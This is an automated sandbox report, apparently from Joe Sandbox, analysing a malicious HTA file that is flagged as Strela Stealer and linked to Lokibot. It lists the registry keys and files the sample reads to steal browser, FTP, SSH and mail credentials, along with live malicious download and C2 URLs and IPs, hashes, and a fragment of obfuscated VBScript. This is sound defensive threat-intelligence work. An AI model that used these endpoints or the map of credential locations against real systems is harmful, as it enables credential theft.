Source: Yara match	File source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 2736, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000D.00000002.2893956116.0000000001528000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Strela Stealer

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 5820, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: PopPassword		13_2_0040D069
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: SmtpPassword		13_2_0040D069

Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Strela Stealer

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 5820, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	1 Exploitation for Client Execution	111 Scripting	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 DLL Side-Loading	1 Access Token Manipulation	2 Obfuscated Files or Information	2 Credentials in Registry	14 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	4 PowerShell	Logon Script (Windows)	211 Process Injection	1 Software Packing	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	11 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	21 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	211 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta	21%	ReversingLabs	Script-JS.Trojan.Acsogenixx

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\188E93\31437F.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT	0%	Avira URL Cloud	safe
https://aka..ora	0%	Avira URL Cloud	safe
http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFhN	0%	Avira URL Cloud	safe
https://1017.filemail	0%	Avira URL Cloud	safe
http://192.3.243.136/33/LOGLK.txt	0%	Avira URL Cloud	safe
94.156.177.95/simple/five/fre.php	100%	Avira URL Cloud	malware
http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF$	0%	Avira URL Cloud	safe
http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF(s	0%	Avira URL Cloud	safe
http://94.156.177.95/simple/five/fre.php	100%	Avira URL Cloud	malware
http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF	100%	Avira URL Cloud	malware
http://192.3.243.136/33/seemybes	0%	Avira URL Cloud	safe
http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFn	0%	Avira URL Cloud	safe
http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFsLMEM	0%	Avira URL Cloud	safe
https://1017.filemail.com/api/file/geLR	0%	Avira URL Cloud	safe
http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF2	0%	Avira URL Cloud	safe
http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFp	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip.1017.filemail.com	142.215.209.78	true	false		high
1017.filemail.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
94.156.177.95/simple/five/fre.php	true	Avira URL Cloud: malware	unknown
http://kbfvzoboss.bid/alien/fre.php	false		high
http://alphastand.top/alien/fre.php	false		high
http://94.156.177.95/simple/five/fre.php	true	Avira URL Cloud: malware	unknown
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f	false		high
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high
http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF	true	Avira URL Cloud: malware	unknown
http://192.3.243.136/33/LOGLK.txt	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S	powershell.exe, 00000009.00000002.1951506450.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://1017.filemail	powershell.exe, 00000007.00000002.2329487892.0000000000887000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT	powershell.exe, 00000009.00000002.1949160377.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1949062119.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1950549145.0000000002F40000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.1831158393.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1714213863.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1951506450.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000003.00000002.1712155166.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.mic	powershell.exe, 00000007.00000002.2359283206.0000000006FE0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000009.00000002.1951506450.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.1712155166.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000009.00000002.1951506450.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka..ora	powershell.exe, 00000003.00000002.1715998634.0000000007635000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000001.00000002.1822805726.0000000004F88000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ibsensoftware.com/	aspnet_compiler.exe, aspnet_compiler.exe, 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000009.00000002.1951506450.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF(s	powershell.exe, 00000001.00000002.1833233000.000000000780F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000009.00000002.1951506450.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	false		high
https://1017.filemail.com	powershell.exe, 00000009.00000002.1951506450.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFhN	powershell.exe, 00000001.00000002.1833233000.0000000007779000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://go.micros	powershell.exe, 00000003.00000002.1712155166.0000000005397000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000009.00000002.1951506450.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.1822805726.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1712155166.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2337193230.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2337193230.0000000004A19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1951506450.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF$	powershell.exe, 00000001.00000002.1833233000.0000000007852000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://192.3.243.136/33/seemybes	powershell.exe, 00000001.00000002.1822805726.000000000595C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.1712155166.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000009.00000002.1951506450.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.1831158393.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1714213863.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1951506450.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	false		high
https://1017.filemail.com/api/file/geLR	powershell.exe, 00000007.00000002.2337193230.0000000004D62000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFn	powershell.exe, 00000001.00000002.1833233000.0000000007852000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFsLMEM	powershell.exe, 00000001.00000002.1833233000.0000000007779000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.1822805726.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1712155166.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2337193230.0000000004A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1951506450.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnticffhmt	powershell.exe, 00000009.00000002.1995186710.00000000072B1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF2	powershell.exe, 00000001.00000002.1821744750.00000000032A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFp	powershell.exe, 00000001.00000002.1833233000.0000000007852000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.215.209.78	ip.1017.filemail.com	Canada	32156	HUMBER-COLLEGECA	false
192.3.243.136	unknown	United States	36352	AS-COLOCROSSINGUS	true
94.156.177.95	unknown	Bulgaria	43561	NET1-ASBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1556630
Start date and time:	2024-11-15 18:13:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winHTA@20/23@1/3
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 80 Number of non-executed functions: 12
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 6676 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 2504 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4592 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6884 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta

Simulations

Behavior and APIs

Time	Type	Description
12:14:00	API Interceptor	121x Sleep call for process: powershell.exe modified
12:14:30	API Interceptor	77x Sleep call for process: aspnet_compiler.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
142.215.209.78	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse
	SAMPLE_PHOTO.js	Get hash	malicious	AgentTesla	Browse
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse
	INQ02010391.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Order_Confirmation.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse
	Po docs.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse
	SWIFT 103 202414111523339800 111124.pdf.vbs	Get hash	malicious	Remcos	Browse
	seemebestthingswhichevermadebybestthingsgodown.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse
	transferencia interbancaria_867897870877.xlam.xlsx	Get hash	malicious	AgentTesla	Browse
192.3.243.136	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	192.3.243.136/32/SMPLLS.txt
192.3.243.136	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	192.3.243.136/33/LOGLK.txt
94.156.177.95	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.95/simple/five/fre.php
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.95/simple/five/fre.php
	Scan docs.exe	Get hash	malicious	Lokibot	Browse	94.156.177.95/simple/five/fre.php
	Po docs.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.95/simple/five/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip.1017.filemail.com	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	SAMPLE_PHOTO.js	Get hash	malicious	AgentTesla	Browse	142.215.209.78
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	142.215.209.78
	INQ02010391.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.215.209.78
	Order_Confirmation.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	142.215.209.78
	Po docs.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	SWIFT 103 202414111523339800 111124.pdf.vbs	Get hash	malicious	Remcos	Browse	142.215.209.78
	seemebestthingswhichevermadebybestthingsgodown.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	142.215.209.78
	transferencia interbancaria_867897870877.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	142.215.209.78

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HUMBER-COLLEGECA	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	SAMPLE_PHOTO.js	Get hash	malicious	AgentTesla	Browse	142.215.209.78
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	142.215.209.78
	INQ02010391.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.215.209.78
	Order_Confirmation.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	142.215.209.78
	Po docs.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	SWIFT 103 202414111523339800 111124.pdf.vbs	Get hash	malicious	Remcos	Browse	142.215.209.78
	seemebestthingswhichevermadebybestthingsgodown.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	142.215.209.78
	transferencia interbancaria_867897870877.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	142.215.209.78
AS-COLOCROSSINGUS	Signert kontrakt og faktura.xls	Get hash	malicious	Unknown	Browse	107.173.4.61
	New order.xls	Get hash	malicious	Unknown	Browse	192.3.220.29
	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	192.3.243.136
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	192.3.243.136
	Signert kontrakt og faktura.xls	Get hash	malicious	Unknown	Browse	107.173.4.61
	New order.xls	Get hash	malicious	Unknown	Browse	192.3.220.29
	Signert kontrakt og faktura.xls	Get hash	malicious	Unknown	Browse	107.173.4.61
	New order.xls	Get hash	malicious	Unknown	Browse	192.3.220.29
	purchase order (2).xls	Get hash	malicious	Unknown	Browse	198.46.178.167
	purchase order (2).xls	Get hash	malicious	Unknown	Browse	198.46.178.167
NET1-ASBG	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.95
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.95
	Scan docs.exe	Get hash	malicious	Lokibot	Browse	94.156.177.95
	Po docs.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.95
	FDA50N50 ONESMI _10000.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220
	sh.elf	Get hash	malicious	Gafgyt, Mirai	Browse	93.123.85.201
	ntpd.elf	Get hash	malicious	Gafgyt, Mirai	Browse	93.123.85.201
	ftp.elf	Get hash	malicious	Gafgyt, Mirai	Browse	93.123.85.201
	na.elf	Get hash	malicious	Gafgyt, Mirai	Browse	93.123.85.201
	sshd.elf	Get hash	malicious	Gafgyt, Mirai	Browse	93.123.85.201

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	142.215.209.78
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	142.215.209.78
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.215.209.78
	http://portableapps.com	Get hash	malicious	Unknown	Browse	142.215.209.78
	Order88983273293729387293828PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.215.209.78
	file.exe	Get hash	malicious	LummaC	Browse	142.215.209.78
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	142.215.209.78
	grd.ps1	Get hash	malicious	LummaC Stealer	Browse	142.215.209.78
	SAMPLE_PHOTO.js	Get hash	malicious	AgentTesla	Browse	142.215.209.78
	Email_sending_restriction_[sebastien.morel!](#HOHSM).html	Get hash	malicious	Unknown	Browse	142.215.209.78

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\188E93\31437F.exe	invoice727282_PDF..exe	Get hash	malicious	AgentTesla	Browse
	#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse
	6038732).vbs	Get hash	malicious	Lokibot	Browse
	cirby0J3LP.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, XWorm, zgRAT	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse
	3vj5tYFb6a.exe	Get hash	malicious	Snake Keylogger, zgRAT	Browse
	50000PCSPIC12F1501-ESN.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win32.KeyloggerX-gen.6339.24340.exe	Get hash	malicious	XWorm	Browse
	Jdxvyx.exe	Get hash	malicious	AgentTesla	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks[1].tiff

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (381), with CRLF line terminators
Category:	dropped
Size (bytes):	143380
Entropy (8bit):	3.6712104367027116
Encrypted:	false
SSDEEP:	3072:WKjHhIZg8X9/CZUN6RRj09RrXaTGZ8tE6cORoG73St8gt5peRyMyr0+EnGGwm:fN8X9/CGIRR2Ro
MD5:	7450B95AC8FA59E12E46A4C2A6CF36ED
SHA1:	F1E5EC3ACDD59283CCAF7611F572CCBBD4009B63
SHA-256:	12A0A30BF86B8A8EB35E4309A523FAF7673C467DC623F3CFB09FCD45FC4FC139
SHA-512:	951B71EDDD8C390E9BB37585F8865E7E7343A967A62321EDD74B06D9474DF3F0C8C5440A91E96D672D5369B181828C655F28D233F5E3A5FB6945C48EF808B754
Malicious:	false
Preview:	..........F.u.n.c.t.i.o.n. .s.o.n.a.n.t.e.(.B.y.V.a.l. .p.i.o.c.a.m.e.c.r.a.n.s.,. .B.y.V.a.l. .x.a.n.t.e.l.o.m.a.,. .B.y.V.a.l. .r.e.c.a.t.a.d.a.m.e.n.t.e.)..... . . . .D.i.m. .p.i.r.o.s.e..... . . . .p.i.r.o.s.e. .=. .I.n.S.t.r.(.p.i.o.c.a.m.e.c.r.a.n.s.,. .x.a.n.t.e.l.o.m.a.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .p.i.r.o.s.e. .>. .0..... . . . . . . . .p.i.o.c.a.m.e.c.r.a.n.s. .=. .L.e.f.t.(.p.i.o.c.a.m.e.c.r.a.n.s.,. .p.i.r.o.s.e. .-. .1.). .&. .r.e.c.a.t.a.d.a.m.e.n.t.e. .&. .M.i.d.(.p.i.o.c.a.m.e.c.r.a.n.s.,. .p.i.r.o.s.e. .+. .L.e.n.(.x.a.n.t.e.l.o.m.a.).)..... . . . . . . . .p.i.r.o.s.e. .=. .I.n.S.t.r.(.p.i.r.o.s.e. .+. .L.e.n.(.r.e.c.a.t.a.d.a.m.e.n.t.e.).,. .p.i.o.c.a.m.e.c.r.a.n.s.,. .x.a.n.t.e.l.o.m.a.)..... . . . .L.o.o.p..... . . . ..... . . . .s.o.n.a.n.t.e. .=. .p.i.o.c.a.m.e.c.r.a.n.s.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...A.t.E.n.d.O.f.S.t.r.e.a.m..... . . . . . .

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5829
Entropy (8bit):	4.901113710259376
Encrypted:	false
SSDEEP:	96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
MD5:	7827E04B3ECD71FB3BD7BEEE4CA52CE8
SHA1:	22813AF893013D1CCCACC305523301BB90FF88D9
